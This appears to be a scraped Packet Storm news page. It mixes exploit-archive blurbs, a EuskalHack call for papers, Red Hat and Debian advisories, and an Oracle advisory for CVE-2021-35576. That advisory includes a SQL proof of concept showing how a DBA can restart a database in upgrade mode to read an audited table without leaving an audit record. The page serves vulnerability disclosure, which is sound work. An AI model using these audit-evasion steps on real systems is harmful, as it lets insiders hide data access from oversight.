GNUnet is a peer-to-peer framework with focus on providing security. All peer-to-peer messages in the network are confidential and authenticated. The framework provides a transport abstraction layer and can currently encapsulate the network traffic in UDP (IPv4 and IPv6), TCP (IPv4 and IPv6), HTTP, or SMTP messages. GNUnet supports accounting to provide contributing nodes with better service. The primary service build on top of the framework is anonymous file sharing.

GNUnet P2P Framework 0.19.1

Complete comprehensive archive of all 1,384 exploits added to Packet Storm in 2022.

Packet Storm New Exploits For 2022

This archive contains all of the 82 exploits added to Packet Storm in December, 2022.

Packet Storm New Exploits For December, 2022

A design flaw in the Chrome Synchronous Mojo message handling introduces unexpected reentrancy and allows for multiple use-after-free vulnerabilities.

Chrome Synchronous Mojo Use-After-Free

The crewjam/saml go library is vulnerable to an authentication bypass when processing SAML responses containing multiple Assertion elements.

crewjam/saml Signature Bypass

EuskalHack Security Congress sixth edition is a new proposal from the EuskalHack Computer Security Association, with the aim to promote the community growth and the culture in the digital security field. As usual, in this new edition proximity to our public and technical quality will be our hallmarks. This exclusive conference is shaping up as the most relevant in Basque Country, with an estimated 200 attendees for this sixth edition. The participants include specialized companies, public organisms, state security organizations, professionals, hobbyists and students in the area of security and Information Technology. The date for the conference is the 23th and 24th of June 2023 in the lovely city of Donostia San Sebastian.

                                                                                                                                          i@@@@@@@@@@@@t                                                                                                 ;@@@@@@@@88@@@@@@@@t                                                                                            ,@@@@@:          .@@@@@1                                                                                         C@@@@                8@@@8                                                                                       L@@@L                  ;@@@8                                                                                      @@@0                    f@@@,                                                                                    1@@@.                     @@@C                                                                                ::  t@@@                      @@@0   ,                                                                           @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@f                                                                          @@           G@@@@@@@@@@@G          i@L            _____          _         _ _   _            _                  @@       1@@@t;8@C8GG088.f@@@i      ;@f           | ____|   _ ___| | ____ _| | | | | __ _  ___| | __              @@     8@@t8@@@@@@i@L@0@@@@0;@@G    ;@f           |  _|| | | / __| |/ / _` | | |_| |/ _` |/ __| |/ /              @@   f@@ .@@@@f@01C@L1@@C@@@@ .@@:  ;@f           | |__| |_| \__ \   < (_| | |  _  | (_| | (__|   <               @@  8@G  @GL;8@@@@@@@@@@@L:C0@  G@C ;@f           |_____\__,_|___/_|\_\__,_|_|_|_|_|\__,_|\___|_|\_\              @@ 8@L     @@@@@@@@@@@@@@@@f     C@t;@f           / ___|  ___  ___ _   _ _ __(_) |_ _   _                         @@i@@     @@@@@@@;   ,@@@@@@8     @@i@f           \___ \ / _ \/ __| | | | '__| | __| | | |                        @@@@i    @@@@@@@       0@@@@@i    i@@@f            ___) |  __/ (__| |_| | |  | | |_| |_| |                       @@@@@0    @@@@@@8       C@@@@@G   1@@@@@;          |____/ \___|\___|\__,_|_|  |_|\__|\__, |    ___    ___ _        @@@@,    @@@@@@@8     C@@@@@@L    ,@@@f            / ___|___  _ __   __ _ _ __ ___  |___/__   \  \  /  /| |        @@C@C    :@@@@@@@@   @@@@@@@@     C@t@f           | |   / _ \| '_ \ / _` | '__/ _ \/ __/ __|   \  \/  / | |        @@ @@     ;@@@@@@@   @@@@@@@      @@;@f           | |__| (_) | | | | (_| | | |  __/\__ \__ \    \    /  | |        @@ ,@@      8@@@@@@@@@@@@@i      @@ ;@f            \____\___/|_| |_|\__, |_|  \___||___/___/     \__/   |_|        @@  .@@,      .@@@@@@@@@       :@@  ;@f                             |___/                                         @@    0@@  .8@0C@8@@@8@0L@8,  @@C   ;@f                                                                           @@      0@@L  :@@@@@@@@@,  G@@G     ;@f                                                                           @@        .8@@@8C@C@18G@@@@8.       ;@f                                                                          @@@8GGGGGGGGGGGG8@@@@@@@8GGGGGGGGGGGG@@@,                                                                         G@@1:::::::::::::::0@::::::::::::::::@@@                                                                   ] EuskalHack Security Congress VI Call For Papers [Introduction------------EuskalHack Security Congress sixth edition is a new proposal from the EuskalHack Computer Security Association, with the aim to promote the community growth and the culture in the digital security field. As usual, in this new edition proximity to our public and technical quality will be our hallmarks.This exclusive conference is shaping up as the most relevant in Basque Country, with an estimated 200 attendees for this sixth edition.The participants include specialized companies, public organisms, state security organizations, professionals, hobbyists and students in the area of security and Information Technology.Date and location-----------------The date for the conference is the 23th and 24th of June 2023 in the lovely city of Donostia – San Sebastian.Take part as a speaker----------------------We want to open the doors to all those who wish to be part of this fifth edition of the EuskalHack Security Congress in one of the various categories of talks and workshops we offer.We are looking for small workshops or talks related to digital security, information security or tech in general, such as: - Robotics, Drones, Consoles, Hardware Hacking, Gadgets, mobile environments... - Critical infrastructure security, industrial environments, Smart City, financial... - Cloud insecurity, virtualization, containers, Hardening, DevOps, cloud forensics... - GSM signal hacking, SDR, LTE, 4G/5G, Satellite links, VoIP... - Cryptography, steganography, forensics techniques and countermeasures... - AI, Neuronal networks, Data mining, statistical modeling... - Malware, APT, Sandboxing, Sandbox escapes, Bypassing “things”... - Corporate security and intelligence, Social engineering, OPSEC, OSINT... - Web Hacking, SQL and NoSQL injection, LDAP injection, Hacking with search engines... - Hacktivism, net neutrality, Deep web, darknet, cryptocurrencies... - Reverse engineering.All proposals will be valued according to their originality, educational value, contribution to the community, and the capacity to make our audience have a good time.Highest priority will be given to those proposals that have not been previously exhibited at another event. Please don't forget to indicate it when making your submission.Language and internationalization---------------------------------At EuskalHack we value linguistic diversity and internationalization; this is why we accept talks in Spanish, Basque or English. Just let us know what language you plan to use for your slides and for the talk. Note: We positively value bilingual options which can be understood by the maximum number of attendees as possible as, for example, slides in one language while speaking in another one.Talks and Workshops-------------------We will have several spaces over the course of the event, which will include talks and workshops concurrently, taking two different approaches: * Standard talks: 50 minutes duration * Specific workshops: 120 minutes duration    Once all the proposals have been received, the total number of presentations of each type will be determined, considering aspects such as technological diversity and the audience.Workshops will be taught on June 24 with a capacity of 40 attendees. In addition, please confirm the necessary infrastructure and material required in the sent proposal.Proposals---------Proposal submissions should be sent before April 23th through the forms found on the following links:ENGLISH    https://forms.gle/xr3wEfiJYuFkwVYr5SPANISH    https://forms.gle/iPH3LRoSfzyjY3Em6  EUSKERA     https://forms.gle/CGRhHeVbCysQ5A7G8Dates to consider-----------------The following are the dates and milestones which should be considered during various phases by the speakers directly involved:26/12/22    Speaker registration begins23/04/23    Speaker registration ends30/04/23    Speaker confirmation date deadline by the organization 15/05/23    Speaker requirements submission31/05/23    Follow-up communication22/06/23    Speakers reception23/06/23    EuskalHack Security CongressCommitment in meeting the dates set by those interested for the paper planning and effective implementation of the congress is requested.Speaker rights and privileges----------------------------- * Take part in the reference security congress in Basque Country. * Round trip paid by the organization (conditions to be agreed *). * Accommodation paid in a hotel near to the congress, in the beautiful city of Donostia - San Sebastian (Double room). * Complete access to the conference with a companion. * Dinners with the other speakers and conference organizers.Disclaimer---------- * The talks and workshops not exhibited previously at other security congresses or media will be considered a priority. * Compliance with obligations and regulations by all concerned parties is vital to avoid any setbacks for the speaker and the congress. * The duration of the talks must stick to the terms of the agreement, allowing the audience to have time for the round of questions. * The talks and workshops must stick to the computer security ethical code, common sense and the applicable laws. * It is essential that you indicate the needs regarding travel and accommodation in order to manage your stay with us in the best possible way.  The organization reserves the right not to take charge of this aspect if it is not expressly indicated.Sponsors--------------Being part of EuskalHack as a sponsoring company implies having presence and impact in a unique and singular area, allowing directing a message to a target audience, and facilitating and strengthening your brand and products’ knowledge in a major community event.We have a maximum number of allowed sponsors, as we consider it essential to establish a balance between the visitors and the companies involved. If you would like to be a part of the conference, please contact us as soon as possible at the following address: info@euskalhack.orgContact-------Web:        http://www.euskalhack.org/Mail:       info@euskalhack.orgTwitter:    @EuskalHack

EuskalHack Security Congress VI Call For Papers

Oracle versions 12.1.0.2, 12.2.0.1, and 19c suffer from a Unified Audit Policy bypass vulnerability.

    Title: CVE-2021-35576 – Oracle database system Unified Audit Policy ByPassProduct:                   DatabaseManufacturer:              OracleAffected Version(s):       12.1.0.2, 12.2.0.1, 19cTested Version(s):         19cRisk Level:                lowSolution Status:           FixedManufacturer Notification: 2021-03-17Solution Date:             2021-10-17Public Disclosure:         2022-06-11CVE Reference:             CVE-2021-35576Author of Advisory:        Emad Al-MousaOverview:Oracle Database is a general purpose relational database management system (RDMBS).Unified Auditing is the supported mechanism to capture database audit logs. The unified audit trail captures audit information from a variety of sources.The unified audit trail, which resides in a read-only table in the AUDSYS schema in the SYSAUX tablespace, makes this information available in a uniform format in the UNIFIED_AUDIT_TRAIL data dictionary view, and is available in both single-instance and Oracle Database Real Application Clusters environments. In addition to the user SYS, users who have been granted the AUDIT_ADMIN and AUDIT_VIEWER roles can query these views. If your users only need to query the views but not create audit policies, then grant them the AUDIT_VIEWER role.*****************************************Vulnerability Details:The vulnerability will allow database administrator or system admin with access to the database server (either local login or remote authentication)to bypass a custom in-place audit policy defined in the oracle database system. Moreover, setting the database in upgrade mode will disable auditingand threat actor can perform malicious operations without detection.*****************************************Proof of Concept (PoC):I will create a table in pluggable database PDB1 under HR schema and insert few records:SQL> CREATE TABLE HR.EMPLOYEE(  FIRST_NAME  VARCHAR2(50),  LAST_NAME   VARCHAR2(50));SQL> INSERT INTO HR.EMPLOYEE (   FIRST_NAME, LAST_NAME)VALUES ( 'EMAD','MOUSA' );SQL> commit;SQL> INSERT INTO HR.EMPLOYEE (   FIRST_NAME, LAST_NAME)VALUES ( 'SAMI','MOUSA' );SQL> commit;I will now create audit policy:SQL> CREATE AUDIT POLICY SELECT_P1 actions select on HR.EMPLOYEE;SQL> audit policy SELECT_P1;To check audit policies configured in PDB1 database:SQL> SELECT * FROM audit_unified_enabled_policies;Now, let us simulate executing the select statement against the monitored/audited table while database is in upgrade mode:sqlplus / as sysdbaSQL> alter session set container=PDB1;SQL> shutdown immediate;SQL> startup upgrade;SQL> select * from HR.EMPLOYEE;SQL> startup force;SQL> exec SYS.DBMS_AUDIT_MGMT.FLUSH_UNIFIED_AUDIT_TRAIL;Checking the audit logs using the query, NO entry is found recorded in the unified audit trail:SQL> select OS_USERNAME,USERHOST,DBUSERNAME,CLIENT_PROGRAM_NAME,EVENT_TIMESTAMP,ACTION_NAME,OBJECT_SCHEMA,OBJECT_NAME,SQL_TEXT from unified_audit_trail where OBJECT_NAME=’EMPLOYEE’ order by EVENT_TIMESTAMP desc;So, even though audit policy was configured in the database a DBA/System Admin can view the audited sensitive table without a trace as No record will be populated in UNIFIED_AUDIT_TRAIL view !*****************************************References:https://www.oracle.com/security-alerts/cpuoct2021.html https://databasesecurityninja.wordpress.com/2022/06/11/cve-2021-35576-bypassing-unified-audit-policy/https://nvd.nist.gov/vuln/detail/CVE-2021-35576Credit:Emad Al-Mousa: CVE-2021-35576

Oracle Unified Audit Policy Bypass

Red Hat Security Advisory 2023-0005-01 - The Byte Code Engineering Library is intended to give users a convenient way to analyze, create, and manipulate Java class files.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: bcel security update  
Advisory ID:       RHSA-2023:0005-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0005  
Issue date:        2023-01-02  
CVE Names:         CVE-2022-42920  
====================================================================  
1. Summary:

An update for bcel is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 9) - noarch

3. Description:

The Byte Code Engineering Library (Apache Commons BCEL) is intended to give  
users a convenient way to analyze, create, and manipulate (binary) Java  
class files (those ending with .class).

Security Fix(es):

* Apache-Commons-BCEL: arbitrary bytecode produced via out-of-bounds  
writing (CVE-2022-42920)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2142707 - CVE-2022-42920 Apache-Commons-BCEL: arbitrary bytecode produced via out-of-bounds writing

6. Package List:

Red Hat Enterprise Linux AppStream (v. 9):

Source:  
bcel-6.4.1-9.el9_1.src.rpm

noarch:  
bcel-6.4.1-9.el9_1.noarch.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-42920  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY7KzLtzjgjWX9erEAQi1RxAAjOBWF4SlAzB+rMSa0jprRya01ZR1l47y  
717QoQX9htFZAt/rT0+ra8x612EJFAczDbducY5QykcjMdsq2b7N2hKscevc6xYr  
IsXJGTzNwfMAGMs6R1WSiGhAQA9Fop6s/+A9noGR67IWCmp3ugEs/YyZEPxb6cZr  
oxGgp2ClWpuUoZ0MUyhoW8gJx01DZi8jgcUzE8+mfGEFSBIsjIvJ6jQpFTmSAAwe  
iz6kN24ANeO9FLtGtEZmVdhwwaowIONU4TvVQ0V68Abeipxqou9GhoCFDLfI4gRa  
JhgfpYrRPTQckfTZGemN+1P6L3FgMZztIzoa8V3zEwhw8UG4Ofslm/aMPV8KZukq  
XDrRNQgP9BXFr0ccJpF1v62q3hgQmX4oZBkpjujfeZD1KGYl5IVmOJH3Ry/FJUui  
f9WXKJlW7Jw1L9bO6S8vIvPtkbgwAZIjuFhm96uSqhCu7Qlr82t2hNRCH6d5X0EW  
2pwJmhn0o+7I3DUgogmWbRh/qEBIByZWtZP3PTU9Fh3f8Bf+6lnLwwgEzB2sbNDO  
RaybVJmHp1O5XpfCGNV7H/dGh7sAN/nzyEjzF1oB/QA1dbDkiudQCczx4wvtxpFu  
KpyF8N+R8Xn1VASx+X7LEbfaQAnVATutFUnYp39gT7PgEBDTt3pPH9l2l/wNhSJM  
tE7d9mkqkrs=gsMH  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0005-01

Red Hat Security Advisory 2023-0004-01 - The Byte Code Engineering Library is intended to give users a convenient way to analyze, create, and manipulate Java class files.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: bcel security update  
Advisory ID:       RHSA-2023:0004-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0004  
Issue date:        2023-01-02  
CVE Names:         CVE-2022-42920  
====================================================================  
1. Summary:

An update for bcel is now available for Red Hat Enterprise Linux 9.0  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream EUS (v.9.0) - noarch

3. Description:

The Byte Code Engineering Library (Apache Commons BCEL) is intended to give  
users a convenient way to analyze, create, and manipulate (binary) Java  
class files (those ending with .class).

Security Fix(es):

* Apache-Commons-BCEL: arbitrary bytecode produced via out-of-bounds  
writing (CVE-2022-42920)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2142707 - CVE-2022-42920 Apache-Commons-BCEL: arbitrary bytecode produced via out-of-bounds writing

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v.9.0):

Source:  
bcel-6.4.1-9.el9_0.src.rpm

noarch:  
bcel-6.4.1-9.el9_0.noarch.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-42920  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY7KzMdzjgjWX9erEAQhNnA/6Aj0dFqQToL48z8urkAHu9cjbjtXe8WY4  
OtTUIPiNcx/ag0nFZXiJAg9Fpm1zsZ/vtijr+0g1zOwDH+jxsD6Jls0B2hvJ231+  
MGpfDLLSbAiGPBi+h6bfS/5B0pVnBPzwIqHDuw88pZ65oTvYrSbesBxQRwSlpoLx  
KVNaZLcI1un3Tnj0B+g1PTenIoZr4t2ew5a1UBHG6922PfhpjkkGZkEMMGXhS39u  
IoDnZ86D6EwKgfgkI3DRvWROyllD3Uwn2K2LxWbGa3h6kgpIpLAwsBLs46pnoyYm  
F0SFZk/dLqWfAlQdBuQf9puG9b/UgF9afz/Sd823QItmV53i0K9969PKJTXd7hKV  
kup5w8Q+DXPB4QkVkirX/45vw8HynC3f+3v2PtIG4RX4vmavIKa7KH/GyQP+jKfj  
I42jho3Bof5QH2HYuYOPrsxc1Q9kuyNPy6C8q4kwj42I3T7uWnn1eztodGniv2qN  
ewOpSbIvQF9qgnpoDGSAydp6AfWq1hXLApWgq3Q3gwp/Bw4CVRF9BNaiGO92Qan8  
Jh6jVdoBrLlpQeTeG3KNSA/cuagQzDFOlNPGAlRweoZd8HU1DKtbKVAWiy98WkcZ  
wX6h+/MheGxofaA5JKNpmF5T8a+6x5fOlLQW9DFxHtNXWPI6TpWp9aC0F2TOgjqt  
4lvL+q5bFIM=2oN+  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0004-01

Debian Linux Security Advisory 5310-1 - It was discovered that ruby-image-processing, a ruby package that provides higher-level image processing helpers, is prone to a remote shell execution vulnerability when using the #apply method to apply a series of operations coming from unsanitized user input.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5310-1                   security@debian.orghttps://www.debian.org/security/                     Salvatore BonaccorsoDecember 31, 2022                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : ruby-image-processingCVE ID         : CVE-2022-24720Debian Bug     : 1007225It was discovered that ruby-image-processing, a ruby package thatprovides higher-level image processing helpers, is prone to a remoteshell execution vulnerability when using the #apply method to apply aseries of operations coming from unsanitized user input.For the stable distribution (bullseye), this problem has been fixed inversion 1.10.3-1+deb11u1.We recommend that you upgrade your ruby-image-processing packages.For the detailed security status of ruby-image-processing please referto its security tracker page at:https://security-tracker.debian.org/tracker/ruby-image-processingFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmOwA+1fFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xNDz0TryQ/5AUPT7LHsRt88T20BS/X9gDvJogsk2Sm5YdjL3PUKOaRyE0Vrz6F6nFQlnRGCwg26d1KGSrjS997RzkataRunBfjfTyiXjnHct8oRi3kz1tHimjmeyxv3+3CjC11TipNbMJA2zC85xeHBrNTdSpw7nJWMZ1awSTHeo1RIDUVasZ250pGoDf3eloNZ6rOpmHS75VqUhss2CpR/LicpZKg0Jov1/x21KY+hzDPFJ24j4IAeLTNURt33nuaWtsoxDAT6duN1QA0hZ3B8rec4EIPE1ZVROcQtjAl+rDegtXKCTujFD7qTEt3wmUnVX8BrdzFLHCel+Fj5V0sah8tVo+v+lzjYD1tzCO7b6tOFGDgavZHHWXSKiQjkKy+1ovarp0fftjwminnstlS7+ZlKMGYRoYVmcvrK8RZlvKjhceTyT+BtaYkaDvpsBdm+xp8ghx28jgIK/Mn+1jYqiEtD2GciOs0SAVPWq5hit9I3kXZ6x/u3waTvw0Du24q3bimDD4o36JzdwOKcqRzKZVersdI17oMQ2CV1tyeeUnN7eEe59MfoKC3xCR7JfaokxpOvVzmYbO5p7s0VuwjLti9XhCc0mzhfNJzpvyJ3o3quBd7pr26FCLk1vt6uwTPb/q99Q32Jdm6lepKJeop9VRDO3epNmN8xSrDvqY/2Ho/ycq5owAg=GQyz-----END PGP SIGNATURE-----